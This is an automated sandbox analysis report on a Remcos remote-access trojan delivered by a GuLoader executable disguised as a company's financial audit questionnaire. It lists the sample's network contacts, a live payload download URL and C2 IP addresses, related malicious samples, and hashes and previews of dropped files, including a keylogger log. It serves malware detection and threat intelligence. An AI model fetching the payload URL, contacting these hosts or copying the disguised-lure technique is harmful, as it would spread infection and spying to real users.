              geoplugin.net
              178.237.33.50
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                  high
                  http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.binfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.office.com/bhv8781.tmp.12.drfalse
                    high
                    http://www.imvu.comrSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448861708.0000000033530000.00000040.10000000.00040000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      high
                      http://www.imvu.compDataSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000003.2671982140.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000003.2672022326.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aefd.nelreports.net/api/report?cat=bingthbhv8781.tmp.12.drfalse
                        high
                        http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.binSSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/json.gp-Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.imvu.comSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000003.2671982140.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000003.2672022326.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                            high
                            https://aefd.nelreports.net/api/report?cat=wsbbhv8781.tmp.12.drfalse
                              high
                              http://www.nirsoft.netSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000C.00000002.2690904376.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                high
                                https://aefd.nelreports.net/api/report?cat=bingaotakbhv8781.tmp.12.drfalse
                                  high
                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgbhv8781.tmp.12.drfalse
                                    high
                                    https://deff.nelreports.net/api/report?cat=msnbhv8781.tmp.12.drfalse
                                      high
                                      http://nsis.sf.net/NSIS_ErrorErrorSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exefalse
                                        high
                                        http://www.skinstudio.netGSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3448861708.0000000033530000.00000040.10000000.00040000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          high
                                          https://www.google.comSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            high
                                            https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhv8781.tmp.12.drfalse
                                              high
                                              https://aefd.nelreports.net/api/report?cat=bingaotbhv8781.tmp.12.drfalse
                                                high
                                                http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.binqSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.0000000002578000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv8781.tmp.12.drfalse
                                                  high
                                                  http://geoplugin.net/json.gpMSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://geoplugin.net/json.gpalSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://aefd.nelreports.net/api/report?cat=bingrmsbhv8781.tmp.12.drfalse
                                                        high
                                                        https://www.google.com/accounts/serviceloginSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exefalse
                                                          high
                                                          https://login.yahoo.com/config/loginSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exefalse
                                                            high
                                                            http://geoplugin.net/json.gplVSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.nirsoft.net/Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                high
                                                                http://geoplugin.net/json.gpZSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhv8781.tmp.12.drfalse
                                                                    high
                                                                    http://www.ebuddy.comSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 0000000E.00000002.2672411821.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      66.63.187.30
                                                                      unknownUnited States
                                                                      8100ASN-QUADRANET-GLOBALUSfalse
                                                                      178.237.33.50
                                                                      geoplugin.netNetherlands
                                                                      8455ATOM86-ASATOM86NLfalse
                                                                      162.251.122.87
                                                                      unknownCanada
                                                                      64236UNREAL-SERVERSUStrue
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1576235
                                                                      Start date and time:2024-12-16 17:03:14 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 7m 55s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:16
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@9/18@1/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 97%
                                                                      • Number of executed functions: 184
                                                                      • Number of non-executed functions: 310
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 20.190.177.83, 20.223.35.26, 2.16.158.90, 13.107.246.63, 172.202.163.200, 20.223.36.55
                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                      TimeTypeDescription
                                                                      11:05:32API Interceptor402759x Sleep call for process: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      66.63.187.30Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 66.63.187.30/wBWcspgeBmkxYD199.bin
                                                                      Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 66.63.187.30/hpVMAPRZVuaX36.bin
                                                                      178.237.33.50Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • geoplugin.net/json.gp
                                                                      givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                      • geoplugin.net/json.gp
                                                                      x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                      • geoplugin.net/json.gp
                                                                      162.251.122.87Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                        Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                            scan_241205-801_draft_PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              geoplugin.netRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 178.237.33.50
                                                                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 178.237.33.50
                                                                              givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                              • 178.237.33.50
                                                                              x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                              • 178.237.33.50
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ASN-QUADRANET-GLOBALUSRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 66.63.187.30
                                                                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 66.63.187.30
                                                                              armv4l.elfGet hashmaliciousMiraiBrowse
                                                                              • 204.44.218.122
                                                                              rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                              • 104.223.28.126
                                                                              jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                              • 72.11.146.73
                                                                              2.elfGet hashmaliciousUnknownBrowse
                                                                              • 173.205.82.95
                                                                              Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                                                              • 185.228.81.1
                                                                              tQoSuhQIdC.msiGet hashmaliciousUnknownBrowse
                                                                              • 66.63.187.205
                                                                              Ref#60031796.exeGet hashmaliciousRemcosBrowse
                                                                              • 69.174.98.48
                                                                              gC0jV08bP3.exeGet hashmaliciousMeduza Stealer, PureLog Stealer, RedLine, zgRATBrowse
                                                                              • 66.63.187.209
                                                                              ATOM86-ASATOM86NLRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 178.237.33.50
                                                                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 178.237.33.50
                                                                              givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 178.237.33.50
                                                                              7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                              • 178.237.33.50
                                                                              x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                              • 178.237.33.50
                                                                              7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                              • 178.237.33.50
                                                                              UNREAL-SERVERSUSRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 162.251.122.87
                                                                              Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 162.251.122.87
                                                                              WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                              • 162.251.122.87
                                                                              RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 212.162.149.89
                                                                              purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 212.162.149.66
                                                                              Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 212.162.149.66
                                                                              order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                              • 212.162.149.89
                                                                              PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                              • 212.162.149.89
                                                                              la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                              • 162.251.123.175
                                                                              file.exeGet hashmaliciousRedLineBrowse
                                                                              • 212.162.149.48
                                                                              No context
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dllRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  kahyts.exeGet hashmaliciousGuLoaderBrowse
                                                                                    kahyts.exeGet hashmaliciousGuLoaderBrowse
                                                                                      https://www.imobie.com/go/download.php?product=atiGet hashmaliciousUnknownBrowse
                                                                                        Synarmogoidea.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                          Synarmogoidea.exeGet hashmaliciousGuLoaderBrowse
                                                                                            https://dldir1v6.qq.com/weixin/Windows/WeChatSetup.exeGet hashmaliciousUnknownBrowse
                                                                                              https://dldir1v6.qq.com/weixin/Windows/WeChatSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                SecuriteInfo.com.Trojan.Encoder.17199.16872.exeGet hashmaliciousGuLoaderBrowse
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):144
                                                                                                  Entropy (8bit):3.379519383183141
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:rhlKlyKIlfUl8rlf7Q55JWRal2Jl+7R0DAlBG45klovDl6v:6lZ4Ul/5YcIeeDAlOWAv
                                                                                                  MD5:95E455256696EDBE451F5468FF49888C
                                                                                                  SHA1:856B98710AFDE1F4B61DF1E6CD7E27FBD10C13D6
                                                                                                  SHA-256:C599B9BF77CE667EE40E198C859C91870BD29F0C532896B2F470A6FC0A8B5ABD
                                                                                                  SHA-512:CAAF2AC75A54F5B0946CC5D3D2BAF9E8A336C00261E6E646A8F6E63F9B0507F8F6093F12A068080AE0A9597D891ABDE1457AC75FF5D60B05196F44DFD50550CD
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Preview:....[.2.0.2.4./.1.2./.1.6. .1.1.:.0.4.:.5.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:JSON data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):963
                                                                                                  Entropy (8bit):5.018384957371898
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdVauKyGX85jvXhNlT3/7CcVKWro
                                                                                                  MD5:0F26B79167E7BB356D7AB35E01B90A0E
                                                                                                  SHA1:4655C51903490C3536D4A5D0885D17267526E56C
                                                                                                  SHA-256:0E7A0C4D81A5F0AB568FCF592D369FF0007E1D5DF1130327353347C79BD2BCA6
                                                                                                  SHA-512:B7A8B80DCC0463F5C89DC6F1D8F89E7C570494B9A55A9A05B278371ABDE2D74D3F0A76163A836E8FD7AF94F37A167B9807C441A1C19EF4F04408B509D0204376
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52
                                                                                                  Entropy (8bit):4.725996747697686
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:HM/xiXWR0AXQQLQIfLBJXmgxv:HHpQkIP2I
                                                                                                  MD5:87C38DC6EF4616FF016D1CCC1A793086
                                                                                                  SHA1:AFC6434AAAD4FB1A250AF0D167DAB718DA10B4AF
                                                                                                  SHA-256:781C527A7A89FDBFA481BF8800E255DC1B69E47B2B68040DC39103C114E31849
                                                                                                  SHA-512:CC8EF7D9C98FB663C79A4A00FD68344F7AA3DBA27D68B3AEF463C758A74AEBF8190C8A9532FE91BC7DB32E78FF2C48C43230F03DA226F9A9EF288324EFEBF0FE
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:[Initialize]..First=user32::EnumWindows(i r1 ,i 0)..
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:Extensible storage user DataBase, version 0x620, checksum 0x681f53c0, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17301504
                                                                                                  Entropy (8bit):1.0267483164748157
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:TvQtYV7AyUO+xBGA611GJxBGA611Gv0M6JEX3XX35X3khTArhTA/hTATX3t8nqrv:+yUD3F0TcT0TAiQKU5eUtIGC4Ago
                                                                                                  MD5:1DF37B1AC3F533A4F7E4F7595423F0AC
                                                                                                  SHA1:7DAABB037E97795B728E9A511DECF5DEE7394760
                                                                                                  SHA-256:E20D524852ED7ECD21E1E68978850617608C09301E01488FE00D3046C7C47307
                                                                                                  SHA-512:3FE405031F245C21A78944E8C28B7C6B96FE6CA038F9A89844B64484262DA4D9ED0917C77A5D6F70EF6D6733614A964E080E07C3DA7336947E2E11E0AFFA41BF
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:h.S.... .......V.........gN;....{........................4..........|.......|..h.6.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{...................................S.F.....|...................O\.%....|%..........................#......h.6.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Reputation:high, very likely benign file
                                                                                                  Preview:..
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):56
                                                                                                  Entropy (8bit):4.1929554228332
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:sAAEVvjs1Gj84n:fLbt
                                                                                                  MD5:24C65563D17054B07C6135E87A53CFFD
                                                                                                  SHA1:4765777312BF6C4C7272E61B4DBBCE3202BB2D68
                                                                                                  SHA-256:E145085A50E8790798362058AA0B197B97B8AE38A54FF47EE89FD00DEC4F47CE
                                                                                                  SHA-512:F6419106A5E5D864DA20840817F473556140FC982E271380C3EED2A5BE03C2DC68FB69AB1B2BA5698DEC4CA477377E53C589F9B280FAF436DD94767E5D0CB15F
                                                                                                  Malicious:false
                                                                                                  Preview:kernel32::ReadFile(i r5, i r1, i 15241216,*i 0, i 0)i.r3
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):74
                                                                                                  Entropy (8bit):3.9637832956585757
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                                                  MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                                                  SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                                                  SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                                                  SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                                                  Malicious:false
                                                                                                  Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11776
                                                                                                  Entropy (8bit):5.6559337539154555
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:eo24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol6Sl:k8QIl975eXqlWBrz7YLOl6
                                                                                                  MD5:CA332BB753B0775D5E806E236DDCEC55
                                                                                                  SHA1:F35EF76592F20850BAEF2EBBD3C9A2CFB5AD8D8F
                                                                                                  SHA-256:DF5AE79FA558DC7AF244EC6E53939563B966E7DBD8867E114E928678DBD56E5D
                                                                                                  SHA-512:2DE0956A1AD58AD7086E427E89B819089F2A7F1E4133ED2A0A736ADC0614E8588EBE2D97F1B59AB8886D662AEB40E0B4838C6A65FBFC652253E3A45664A03A00
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Detection: malicious, Browse
                                                                                                  • Filename: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, Detection: malicious, Browse
                                                                                                  • Filename: kahyts.exe, Detection: malicious, Browse
                                                                                                  • Filename: kahyts.exe, Detection: malicious, Browse
                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                  • Filename: Synarmogoidea.exe, Detection: malicious, Browse
                                                                                                  • Filename: Synarmogoidea.exe, Detection: malicious, Browse
                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                  • Filename: SecuriteInfo.com.Trojan.Encoder.17199.16872.exe, Detection: malicious, Browse
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....\.U...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1557322
                                                                                                  Entropy (8bit):3.676634111428845
                                                                                                  Encrypted:false
